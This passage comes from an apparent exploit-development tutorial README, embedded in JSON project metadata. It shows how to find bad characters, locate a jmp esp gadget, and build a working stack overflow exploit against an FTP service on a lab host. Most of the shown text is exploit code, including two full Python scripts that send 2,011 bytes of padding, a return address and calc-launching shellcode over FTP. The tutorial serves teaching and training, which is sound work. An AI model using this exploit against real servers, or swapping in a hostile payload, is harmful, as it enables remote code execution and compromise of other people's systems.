the badchars for the shellcode\n\nFirst we go to log and put this:\n```\nmona.mona(\"bytearray\")\n```\n\n![5](demo_photos/5.png)\n\n![26](demo_photos/26.png)\n\nWe copy the characters and insert them at the end of the script like this:\n\n```\nshellcode += \"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\\x1f\"\nshellcode += \"\\x20\\x21\\x22\\x23\\x24\\x25\\x26\\x27\\x28\\x29\\x2a\\x2b\\x2c\\x2d\\x2e\\x2f\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x3a\\x3b\\x3c\\x3d\\x3e\\x3f\"\nshellcode += \"\\x40\\x41\\x42\\x43\\x44\\x45\\x46\\x47\\x48\\x49\\x4a\\x4b\\x4c\\x4d\\x4e\\x4f\\x50\\x51\\x52\\x53\\x54\\x55\\x56\\x57\\x58\\x59\\x5a\\x5b\\x5c\\x5d\\x5e\\x5f\"\nshellcode += \"\\x60\\x61\\x62\\x63\\x64\\x65\\x66\\x67\\x68\\x69\\x6a\\x6b\\x6c\\x6d\\x6e\\x6f\\x70\\x71\\x72\\x73\\x74\\x75\\x76\\x77\\x78\\x79\\x7a\\x7b\\x7c\\x7d\\x7e\\x7f\"\nshellcode += \"\\x80\\x81\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8d\\x8e\\x8f\\x90\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b\\x9c\\x9d\\x9e\\x9f\"\nshellcode += \"\\xa0\\xa1\\xa2\\xa3\\xa4\\xa5\\xa6\\xa7\\xa8\\xa9\\xaa\\xab\\xac\\xad\\xae\\xaf\\xb0\\xb1\\xb2\\xb3\\xb4\\xb5\\xb6\\xb7\\xb8\\xb9\\xba\\xbb\\xbc\\xbd\\xbe\\xbf\"\nshellcode += \"\\xc0\\xc1\\xc2\\xc3\\xc4\\xc5\\xc6\\xc7\\xc8\\xc9\\xca\\xcb\\xcc\\xcd\\xce\\xcf\\xd0\\xd1\\xd2\\xd3\\xd4\\xd5\\xd6\\xd7\\xd8\\xd9\\xda\\xdb\\xdc\\xdd\\xde\\xdf\"\nshellcode += \"\\xe0\\xe1\\xe2\\xe3\\xe4\\xe5\\xe6\\xe7\\xe8\\xe9\\xea\\xeb\\xec\\xed\\xee\\xef\\xf0\\xf1\\xf2\\xf3\\xf4\\xf5\\xf6\\xf7\\xf8\\xf9\\xfa\\xfb\\xfc\\xfd\\xfe\\xff\"\n```\n\n![27](demo_photos/27.png)\n\n![3 1](oscp_demo_photos/3.1.png)\n\nNow restart the app and then run the exploit\n\n![20](demo_photos/20.png)\n\n![4](demo_photos/4.png)\n\n![2 8](oscp_demo_photos/2.8.png)\n\nWhen finished we will see if the characters were copied, go to cpu-\u003elower left window and right click-\u003ego to-\u003eexpression and set esp.\n\n![3 2](oscp_demo_photos/3.2.png)\n\n![3 3](oscp_demo_photos/3.3.png)\n\nAs we can see, nothing has been copied, 00 badchar\n\n![3 4](oscp_demo_photos/3.4.png)\n\nGo to log and generate another bytearray without 00 with:\n\n```\nmona.mona('bytearray -cpb \"\\\\x00\"')\n```\n\n![5](demo_photos/5.png)\n\n![33](demo_photos/33.png)\n\nNow we copy the output again, put it in the exploit removing the previous one, run it, and so on until we have all the badchars; I am going to do it only with images to make it faster; remember to restart the program every time you run the exploit\n\n![34](demo_photos/34.png)\n\n![3 5](oscp_demo_photos/3.5.png)\n\n![2 8](oscp_demo_photos/2.8.png)\n\n![3 2](oscp_demo_photos/3.2.png)\n\n![3 3](oscp_demo_photos/3.3.png)\n\n![3 6](oscp_demo_photos/3.6.png)\n\n![3 7](oscp_demo_photos/3.7.png)\n\nAfter doing this process a couple of times, we found that the badchars are 00 0a and 0d\n\nWhen we have this we only need to find a shellcode that does not use these badchars, we have this one:\n\nhttps://packetstormsecurity.com/files/156478/Windows-x86-Null-Free-WinExec-Calc.exe-Shellcode.html\n\nAdding the shellcode to our script should look like this, now we have to find a vuln ret address\n\n```\n#!/usr/bin/env python\nfrom socket import *\nfrom time import sleep\nfrom sys import exit, exc_info\nimport os\n\nos.system(\"ifconfig eth0 mtu 3000\")\n\ntarget_ip = \"10.0.2.15\"\nport = int(21)\n\nshellcode = '\\x41' * 2011\nshellcode += '\\x89\\xe5\\x83\\xec\\x20\\x31\\xdb\\x64\\x8b\\x5b\\x30\\x8b\\x5b\\x0c\\x8b\\x5b\\x1c\\x8b\\x1b\\x8b\\x1b\\x8b\\x43\\x08\\x89\\x45\\xfc\\x8b\\x58\\x3c\\x01\\xc3\\x8b\\x5b\\x78\\x01\\xc3\\x8b\\x7b\\x20\\x01\\xc7\\x89\\x7d\\xf8\\x8b\\x4b\\x24\\x01\\xc1\\x89\\x4d\\xf4\\x8b\\x53\\x1c\\x01\\xc2\\x89\\x55\\xf0\\x8b\\x53\\x14\\x89\\x55\\xec\\xeb\\x32\\x31\\xc0\\x8b\\x55\\xec\\x8b\\x7d\\xf8\\x8b\\x75\\x18\\x31\\xc9\\xfc\\x8b\\x3c\\x87\\x03\\x7d\\xfc\\x66\\x83\\xc1\\x08\\xf3\\xa6\\x74\\x05\\x40\\x39\\xd0\\x72\\xe4\\x8b\\x4d\\xf4\\x8b\\x55\\xf0\\x66\\x8b\\x04\\x41\\x8b\\x04\\x82\\x03\\x45\\xfc\\xc3\\xba\\x78\\x78\\x65\\x63\\xc1\\xea\\x08\\x52\\x68\\x57\\x69\\x6e\\x45\\x89\\x65\\x18\\xe8\\xb8\\xff\\xff\\xff\\x31\\xc9\\x51\\x68\\x2e\\x65\\x78\\x65\\x68\\x63\\x61\\x6c\\x63\\x89\\xe3\\x41\\x51\\x53\\xff\\xd0\\x31\\xc9\\xb9\\x01\\x65\\x73\\x73\\xc1\\xe9\\x08\\x51\\x68\\x50\\x72\\x6f\\x63\\x68\\x45\\x78\\x69\\x74\\x89\\x65\\x18\\xe8\\x87\\xff\\xff\\xff\\x31\\xd2\\x52\\xff\\xd0'\n\nprint(\"\\nshellcode content (size \" + str(len(shellcode))  + \" bytes):\\n\")\nprint(\":\".join(\"{:02x}\".format(ord(c)) for c in shellcode))\nprint(\"\\n\")\n\ntarget = inet_aton(target_ip)\ntarget = inet_ntoa(target)\n\ntry:\n    socket = socket(AF_INET, SOCK_STREAM)\nexcept:\n    print \"\\nError creating the network socket\\n\\n%s\\n\" % exc_info()       \n    exit(1)    \n\ntry:\n    print \"Connecting to %s %d\" % (target, port)\n    socket.connect((target, port))\nexcept:\n    print \"\\nError connecting to %s\\n\\n%s\\n\" % (target, exc_info())\n    exit(1)\n    \nprint(\"Connected!\")\nsleep(1)\nprint(socket.recv(1000))\nsleep(1)\nprint(\"Logging as anonymous\")\nsocket.send('USER anonymous\\r\\n')\nsleep(1)\nprint(socket.recv(1024))\nprint(\"Empty password\")\nsleep(1)\nsocket.send('PASS\\r\\n')\nsleep(1)\nprint(socket.recv(1024))\ntry:\n    print \"Sending evil packet to %s %d (length: %d bytes), please wait a few secs....\" % (target, port, len(shellcode))\n    socket.send(shellcode)\n    sleep(4)\n    socket.close()\n\nexcept:\n    print \"\\nError sending evil packet to %s\\n\\n%s\\n\" % (target, exc_info())\n    exit(1)\n\n\nprint(\"\\n\\nDone! :-)\\n\")\n\n\nsleep(1)\n```\n\n![3 8](oscp_demo_photos/3.8.png)\n\nnow we have to find out the memory address to jump to and then run a shellcode that will open the calculator; we are going to use the debugger plugins to locate .dll that are not protected against ASLR\n\nWe are going to restart the program so that it does not remain as it is now, unusable; we go to Debug-\u003eRestart and then four times to run\n\n![20](demo_photos/20.png)\n\n![4](demo_photos/4.png)\n\n![18](demo_photos/18.png)\n\n![3 9](oscp_demo_photos/3.9.png)\n\nNow we are going to use mona to see if we can locate any jmp esp of a .dll and then put the shellcode at the top of the stack and then we will have the return address that we have to put after the script characters to execute the shellcode once we have it.\n\nWe go to log and execute:\n\n```\nmona.mona(\"jmp -r esp\")\n```\n\n![5](demo_photos/5.png)\n\n![4 0](oscp_demo_photos/4.0.png)\n\n![4 1](oscp_demo_photos/4.1.png)\n\nThe address I have pointed out looks pretty good, it has no x00 and ASLR disabled, let's add it to the script\n\n```\nshellcode += '\\x9f\\x53\\x10\\x10' # ret addr\n```\n\n![4 2](oscp_demo_photos/4.2.png)\n\nLet's execute the script!\n\n![2 8](oscp_demo_photos/2.8.png)\n\nFailed, our direction looked good but... what happened? let's look at the stack, bottom right of the cpu.\n\n![4 3](oscp_demo_photos/4.3.png)\n\nIf we go up the stack we can see that our address was passed correctly but the start of the shellcode is higher than it should be, why? easy, the vulnerable function executes a \"ret 4\" that after making the return removes from the stack the next 4 bytes, how to fix this? putting 4 bytes between the return address and the shellcode.\n\n```\nshellcode += 'BBBB'\n```\n\n![4 8](oscp_demo_photos/4.8.png)\n\nThe final script looks like this:\n\n```\n#!/usr/bin/env python\nfrom socket import *\nfrom time import sleep\nfrom sys import exit, exc_info\nimport os\n\nos.system(\"ifconfig eth0 mtu 3000\")\n\ntarget_ip = \"10.0.2.15\"\nport = int(21)\n\nshellcode = '\\x41' * 2011\nshellcode += '\\x9f\\x53\\x10\\x10' # ret addr\nshellcode += 'BBBB'\nshellcode += '\\x89\\xe5\\x83\\xec\\x20\\x31\\xdb\\x64\\x8b\\x5b\\x30\\x8b\\x5b\\x0c\\x8b\\x5b\\x1c\\x8b\\x1b\\x8b\\x1b\\x8b\\x43\\x08\\x89\\x45\\xfc\\x8b\\x58\\x3c\\x01\\xc3\\x8b\\x5b\\x78\\x01\\xc3\\x8b\\x7b\\x20\\x01\\xc7\\x89\\x7d\\xf8\\x8b\\x4b\\x24\\x01\\xc1\\x89\\x4d\\xf4\\x8b\\x53\\x1c\\x01\\xc2\\x89\\x55\\xf0\\x8b\\x53\\x14\\x89\\x55\\xec\\xeb\\x32\\x31\\xc0\\x8b\\x55\\xec\\x8b\\x7d\\xf8\\x8b\\x75\\x18\\x31\\xc9\\xfc\\x8b\\x3c\\x87\\x03\\x7d\\xfc\\x66\\x83\\xc1\\x08\\xf3\\xa6\\x74\\x05\\x40\\x39\\xd0\\x72\\xe4\\x8b\\x4d\\xf4\\x8b\\x55\\xf0\\x66\\x8b\\x04\\x41\\x8b\\x04\\x82\\x03\\x45\\xfc\\xc3\\xba\\x78\\x78\\x65\\x63\\xc1\\xea\\x08\\x52\\x68\\x57\\x69\\x6e\\x45\\x89\\x65\\x18\\xe8\\xb8\\xff\\xff\\xff\\x31\\xc9\\x51\\x68\\x2e\\x65\\x78\\x65\\x68\\x63\\x61\\x6c\\x63\\x89\\xe3\\x41\\x51\\x53\\xff\\xd0\\x31\\xc9\\xb9\\x01\\x65\\x73\\x73\\xc1\\xe9\\x08\\x51\\x68\\x50\\x72\\x6f\\x63\\x68\\x45\\x78\\x69\\x74\\x89\\x65\\x18\\xe8\\x87\\xff\\xff\\xff\\x31\\xd2\\x52\\xff\\xd0'\n\nprint(\"\\nshellcode content (size \" + str(len(shellcode))  + \" bytes):\\n\")\nprint(\":\".join(\"{:02x}\".format(ord(c)) for c in shellcode))\nprint(\"\\n\")\n\ntarget = inet_aton(target_ip)\ntarget = inet_ntoa(target)\n\ntry:\n    socket = socket(AF_INET, SOCK_STREAM)\nexcept:\n    print \"\\nError creating the network socket\\n\\n%s\\n\" % exc_info()       \n    exit(1)    \n\ntry:\n    print \"Connecting to %s %d\" % (target, port)\n    socket.connect((target, port))\nexcept:\n    print \"\\nError connecting to %s\\n\\n%s\\n\" % (target, exc_info())\n    exit(1)\n    \nprint(\"Connected!\")\nsleep(1)\nprint(socket.recv(1000))\nsleep(1)\nprint(\"Logging as anonymous\")\nsocket.send('USER anonymous\\r\\n')\nsleep(1)\nprint(socket.recv(1024))\nprint(\"Empty password\")\nsleep(1)\nsocket.send('PASS\\r\\n')\nsleep(1)\nprint(socket.recv(1024))\ntry:\n    print \"Sending evil packet to %s %d (length: %d bytes), please wait a few secs....\" % (target, port, len(shellcode))\n    socket.send(shellcode)\n    sleep(4)\n    socket.close()\n\nexcept:\n    print \"\\nError sending evil packet to %s\\n\\n%s\\n\" % (target, exc_info())\n    exit(1)\n\n\nprint(\"\\n\\nDone! :-)\\n\")\n\n\nsleep(1)\n```\n\nRestart the app and... Let's execute it!\n\n![2 8](oscp_demo_photos/2.8.png)\n\n![5 0](oscp_demo_photos/5.0.png)\n\nAnd there it is, we've done it!\n\nThe address of the vulnerable function is 00403FB9\n\nDemo made by M4luk0\n\nhttps://www.linkedin.com/in/juan-antonio-gil-chamorro-8607b3197/\n\nhttps://github.com/M4luk0\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftherealdreg%2Fx64dbg-exploiting","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ftherealdreg%2Fx64dbg-exploiting","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftherealdreg%2Fx64dbg-exploiting/lists"}